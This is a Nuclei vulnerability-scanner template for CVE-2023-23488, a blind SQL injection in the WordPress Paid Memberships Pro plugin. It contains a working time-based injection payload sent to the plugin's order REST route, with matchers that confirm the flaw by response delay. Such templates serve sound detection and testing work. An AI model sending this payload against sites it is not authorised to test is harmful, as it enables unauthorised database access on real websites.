nuclei-templates/cves/2023/CVE-2023-23488.yaml

42 lines
1.4 KiB
YAML

id: CVE-2023-23488
info:
name: WordPress Paid Memberships Pro <2.9.8 - Blind SQL Injection
author: dwisiswant0
severity: critical
description: |
WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.tenable.com/security/research/tra-2023-2
- https://wordpress.org/plugins/paid-memberships-pro/
- https://nvd.nist.gov/vuln/detail/CVE-2023-23488
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-23488
cwe-id: CWE-89
metadata:
verified: "true"
tags: wp-plugin,wp,sqli,paid-memberships-pro,cve,cve2023,wordpress,tenable
requests:
- raw:
- |
@timeout: 30s
GET /?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/paid-memberships-pro/js/updates.js HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- duration_1>=5
- status_code_1 != 403 # Wordfence
- contains(body_2, "pmpro_updates")
condition: and
# Enhanced by md on 2023/03/07